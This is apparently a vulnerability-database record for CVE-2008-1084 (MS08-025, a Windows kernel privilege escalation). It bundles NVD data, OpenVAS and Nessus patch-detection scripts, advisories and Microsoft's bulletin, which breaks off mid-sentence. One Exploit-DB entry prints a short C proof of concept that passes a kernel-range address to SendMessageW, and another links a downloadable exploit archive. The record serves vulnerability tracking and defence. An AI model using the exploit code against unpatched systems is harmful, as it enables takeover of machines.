{"cve": [{"lastseen": "2018-10-13T11:34:03", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation. NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys.", "modified": "2018-10-12T17:45:11", "published": "2008-04-08T19:05:00", "id": "CVE-2008-1084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1084", "title": "CVE-2008-1084", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T15:00:53", "bulletinFamily": "exploit", "description": "Microsoft Windows XP/VISTA/2000/2003/2008 Kernel Usermode Callback Local Privilege Escalation Vulnerability (1). CVE-2008-1084. Dos exploit for windows platform", "modified": "2008-04-08T00:00:00", "published": "2008-04-08T00:00:00", "id": "EDB-ID:31585", "href": "https://www.exploit-db.com/exploits/31585/", "type": "exploitdb", "title": "Microsoft Windows XP/VISTA/2000/2003/2008 - Kernel Usermode Callback Local Privilege Escalation Vulnerability 1", "sourceData": "source: http://www.securityfocus.com/bid/28554/info\r\n\r\nMicrosoft Windows is prone to a local privilege-escalation vulnerability.\r\n\r\nThe vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system.\r\n\r\n#include \r\n#include \r\n\r\nint main(int argc,char *argv[])\r\n{\r\n DWORD dwHookAddress = 0x80000000;\r\n\r\n printf( \"\\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\\n\\n\" );\r\n printf( \"Create by Whitecell's Polymorphours@whitecell.org 2008/04/10\\n\" );\r\n\r\n SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress );\r\n return 0;\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/31585/"}, {"lastseen": "2016-01-31T22:13:52", "bulletinFamily": "exploit", "description": "MS Windows XP SP2 (win32k.sys) Privilege Escalation Exploit (MS08-025). CVE-2008-1084. Local exploit for windows platform", "modified": "2008-04-28T00:00:00", "published": "2008-04-28T00:00:00", "id": "EDB-ID:5518", "href": "https://www.exploit-db.com/exploits/5518/", "type": "exploitdb", "title": "Microsoft Windows XP SP2 - Win32k.sys Privilege Escalation Exploit MS08-025", "sourceData": "// ms08-25-exploit #1\r\n// This exploit takes advantage of one of the vulnerabilities \r\n// patched in the Microsoft Security bulletin MS08-25\r\n// http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx\r\n// ---------------------------------------\r\n// Modifications are strictly prohibited.\r\n// For research purposes ONLY.\r\n// ---------------------------------------\r\n// Ruben Santamarta \r\n// www.reversemode.com\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5518.zip (2008-ms08-25-exploit.zip)\r\n\r\n# milw0rm.com [2008-04-28]\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/5518/"}], "openvas": [{"lastseen": "2018-11-21T13:12:40", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS08-025.", "modified": "2018-11-20T00:00:00", "published": "2011-01-10T00:00:00", "id": "OPENVAS:1361412562310801487", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801487", "title": "Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms08-025.nasl 12437 2018-11-20 12:21:11Z santu $\n#\n# Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801487\");\n script_version(\"$Revision: 12437 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-20 13:21:11 +0100 (Tue, 20 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-10 14:22:58 +0100 (Mon, 10 Jan 2011)\");\n script_cve_id(\"CVE-2008-1084\");\n script_bugtraq_id(28554);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/29720\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2008/1149/references\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to execute arbitrary code\n with elevated privileges and take complete control of an affected system.\");\n script_tag(name:\"affected\", value:\"Microsoft Windows XP Service Pack 3 and prior.\n Microsoft Windows 2K3 Service Pack 2 and prior.\n Microsoft Windows Vista Service Pack 1 and prior.\n Microsoft Windows Server 2008 Service Pack 1 and prior.\");\n script_tag(name:\"insight\", value:\"The flaw is due to input validation error in the Windows kernel when\n processing user-supplied data.\");\n script_tag(name:\"solution\", value:\"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS08-025.\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2k:5, win2003:3, winVista:2, win2008:2) <= 0){\n exit(0);\n}\n\nif(hotfix_missing(name:\"941693\") == 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!sysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2k:5) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"5.0.2195.7154\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\nelse if(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.3335\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.3106\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.4256\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\nelse if(hotfix_check_sp(winVista:2) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18027\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n}\nelse if(hotfix_check_sp(win2008:2) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18027\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:40", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS08-025.", "modified": "2017-04-11T00:00:00", "published": "2011-01-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=801487", "id": "OPENVAS:801487", "title": "Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms08-025.nasl 5934 2017-04-11 12:28:28Z antu123 $\n#\n# Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_id(801487);\n script_version(\"$Revision: 5934 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-11 14:28:28 +0200 (Tue, 11 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-10 14:22:58 +0100 (Mon, 10 Jan 2011)\");\n script_cve_id(\"CVE-2008-1084\");\n script_bugtraq_id(28554);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/29720\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2008/1149/references\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx\");\n \n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : \"Successful exploitation could allow remote attackers to execute arbitrary code\n with elevated privileges and take complete control of an affected system.\n Impact Level: System/Application\");\n script_tag(name : \"affected\" , value : \"Microsoft Windows XP Service Pack 3 and prior.\n Microsoft Windows 2K3 Service Pack 2 and prior.\n Microsoft Windows Vista Service Pack 1 and prior.\n Microsoft Windows Server 2008 Service Pack 1 and prior.\");\n script_tag(name : \"insight\" , value : \"The flaw is due to input validation error in the Windows kernel when\n processing user-supplied data.\");\n script_tag(name : \"solution\" , value : \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx\");\n script_tag(name : \"summary\" , value : \"This host is missing a critical security update according to\n Microsoft Bulletin MS08-025.\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\n\nif(hotfix_check_sp(xp:4, win2k:5, win2003:3, winVista:2, win2008:2) <= 0){\n exit(0);\n}\n\n## Hotfix check\nif(hotfix_missing(name:\"941693\") == 0){\n exit(0);\n}\n\n## Get System32 path\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n sysVer = fetch_file_version(sysPath, file_name:\"Win32k.sys\");\n if(sysVer)\n {\n # Windows 2K\n if(hotfix_check_sp(win2k:5) > 0)\n {\n # Grep for Win32k.sys version < 5.0.2195.7154\n if(version_is_less(version:sysVer, test_version:\"5.0.2195.7154\")){\n security_message(0);\n }\n exit(0);\n }\n \n ## Windows XP\n if(hotfix_check_sp(xp:4) > 0)\n {\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n ## Grep for Win32k.sys version < 5.1.2600.3335\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.3335\")){\n security_message(0);\n }\n exit(0);\n }\n }\n \n ## Windows 2003\n else if(hotfix_check_sp(win2003:3) > 0)\n {\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Win32k.sys version < 5.2.3790.3106\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.3106\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n ## Grep for Win32k.sys version < 5.2.3790.4256\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.4256\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n }\n }\n} \n\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n sysVer = fetch_file_version(sysPath, file_name:\"Win32k.sys\");\n if(sysVer)\n {\n # Windows Vista\n if(hotfix_check_sp(winVista:2) > 0)\n {\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Win32k.sys version < 6.0.6001.18027\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18027\")){\n security_message(0);\n }\n exit(0);\n }\n }\n\n # Windows Server 2008\n else if(hotfix_check_sp(win2008:2) > 0)\n {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Win32k.sys version < 6.0.6001.18027\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18027\")){\n security_message(0);\n }\n exit(0);\n }\n }\n }\n}\n\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T21:43:42", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 28554\r\nCVE(CAN) ID: CVE-2008-1084\r\n\r\nMicrosoft Windows\u662f\u5fae\u8f6f\u53d1\u5e03\u7684\u975e\u5e38\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nWindows\u5185\u6838\u5904\u7406\u7528\u6237\u4f20\u5165\u7684\u6570\u636e\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u63d0\u5347\u81ea\u5df1\u7684\u6743\u9650\u3002\r\n\r\nWindows\u5185\u6838\u6ca1\u6709\u6b63\u786e\u9a8c\u8bc1\u4ece\u7528\u6237\u6001\u4f20\u9012\u5230\u5185\u6838\u7684\u8f93\u5165\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u4ee5\u63d0\u5347\u7684\u6743\u9650\u8fd0\u884c\u4ee3\u7801\u3002\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u5e76\u53ef\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002\u653b\u51fb\u8005\u53ef\u968f\u540e\u5b89\u88c5\u7a0b\u5e8f\uff1b\u67e5\u770b\u3001\u66f4\u6539\u6216\u5220\u9664\u6570\u636e\uff1b\u6216\u8005\u521b\u5efa\u62e5\u6709\u5b8c\u5168\u7528\u6237\u6743\u9650\u7684\u65b0\u5e10\u6237\u3002\r\n\n\nMicrosoft Windows XP SP2\r\nMicrosoft Windows Vista SP1\r\nMicrosoft Windows Vista \r\nMicrosoft Windows Server 2008\r\nMicrosoft Windows Server 2003 SP2\r\nMicrosoft Windows Server 2003 SP1\r\nMicrosoft Windows 2000SP4\n Microsoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS08-025\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS08-025\uff1aVulnerability in Windows Kernel Could Allow Elevation of Privilege (941693)\r\n\u94fe\u63a5\uff1a<a href=http://www.microsoft.com/technet/security/Bulletin/MS08-025.mspx?pf=true target=_blank>http://www.microsoft.com/technet/security/Bulletin/MS08-025.mspx?pf=true</a>", "modified": "2008-04-11T00:00:00", "published": "2008-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3143", "id": "SSV:3143", "type": "seebug", "title": "Microsoft Windows\u5185\u6838\u7528\u6237\u6001\u56de\u8c03\u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e\uff08MS08-025\uff09", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:10:51", "bulletinFamily": "scanner", "description": "The remote host contains a version of the Windows kernel that is vulnerable to a security flaw that could allow a local user to elevate his privileges or to crash it (therefore causing a denial of service).", "modified": "2018-11-15T00:00:00", "id": "SMB_NT_MS08-025.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=31798", "published": "2008-04-08T00:00:00", "title": "MS08-025: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (941693)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(31798);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2008-1084\");\n script_bugtraq_id(28554);\n script_xref(name:\"MSFT\", value:\"MS08-025\");\n script_xref(name:\"MSKB\", value:\"941693\");\n\n script_name(english:\"MS08-025: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (941693)\");\n script_summary(english:\"Checks the remote registry for 941693\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"A local user can elevate his privileges on the remote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a version of the Windows kernel that is\nvulnerable to a security flaw that could allow a local user to elevate\nhis privileges or to crash it (therefore causing a denial of service).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-025\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP, 2003,\nVista, 2008.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/04/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS08-025';\nkb = '941693';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'2', win2003:'1,2', vista:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Win32k.sys\", version:\"6.0.6001.22125\", min_version:\"6.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Win32k.sys\", version:\"6.0.6001.18027\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"Win32k.sys\", version:\"6.0.6000.20782\", min_version:\"6.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"Win32k.sys\", version:\"6.0.6000.16646\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Win32k.sys\", version:\"5.2.3790.4256\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"Win32k.sys\", version:\"5.2.3790.3106\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Win32k.sys\", version:\"5.1.2600.3335\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n hotfix_is_vulnerable(os:\"5.0\", file:\"Win32k.sys\", version:\"5.0.2195.7154\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2016-09-25T14:13:54", "bulletinFamily": "exploit", "description": "**Name**| ms08_025 \n---|--- \n**CVE**| CVE-2008-1084 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Win32k ClientLoadMenu Privilege Escalation \n**Notes**| CVE Name: CVE-2008-1084 \nVENDOR: Microsoft \nMSADV: MS08-025 \nRepeatability: One Shot \nMSRC: http://www.microsoft.com/technet/security/Bulletin/MS08-025.mspx \nCVS URL: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1084 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1084 \nDate public: 04/08/2008 \nCVSS: 7.2 \n\n", "modified": "2008-04-08T19:05:00", "published": "2008-04-08T19:05:00", "id": "MS08_025", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms08_025", "type": "canvas", "title": "Immunity Canvas: MS08_025", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:25", "bulletinFamily": "software", "description": "Microsoft Security Bulletin MS08-025 \u2013 Important\r\nVulnerability in Windows Kernel Could Allow Elevation of Privilege (941693)\r\nPublished: April 8, 2008\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves a privately reported vulnerability in the Windows kernel. A local attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts.\r\n\r\nThis is an important security update for all supported editions of Windows 2000, Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThis security update addresses the vulnerability by modifying the way that the Windows kernel validates inputs passed from user mode. For more information about this vulnerability, see the Frequently Asked Questions (FAQ) subsection under the next section, Vulnerability Information.\r\n\r\nRecommendation. Microsoft recommends that customers apply the update at the earliest opportunity.\r\n\r\nKnown Issues. Microsoft Knowledge Base Article 941693 documents the currently known issues that customers may experience when they uninstall this security update.\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows XP Service Pack 2\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium based Systems\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista and Windows Vista Service Pack 1\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for 32-bit Systems\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for x64-based Systems\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for Itanium-based Systems\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhat are the known issues that customers may experience when uninstalling this security update? \r\nMicrosoft Knowledge Base Article 941693 documents the currently known issues that customers may experience when they uninstall this security update. There are binaries that are shared between the security updates offered by MS08-025 (Kernel) and MS08-021 (GDI). After installing both of these security updates (MS08-025 and MS08-021) and then uninstalling the update offered by MS08-025 (Kernel), the update offered by MS08-021 (GDI) may revert back to the vulnerable version, which will result in the MS08-021 (GDI) update being reoffered to the vulnerable system.\r\n\r\nWhere are the file information details? \r\nThe file information details can be found in Microsoft Knowledge Base Article 941693.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. To determine the support life cycle for your software release, visit Microsoft Support Lifecycle.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit Microsoft Support Lifecycle. For more information about the extended security update support period for these 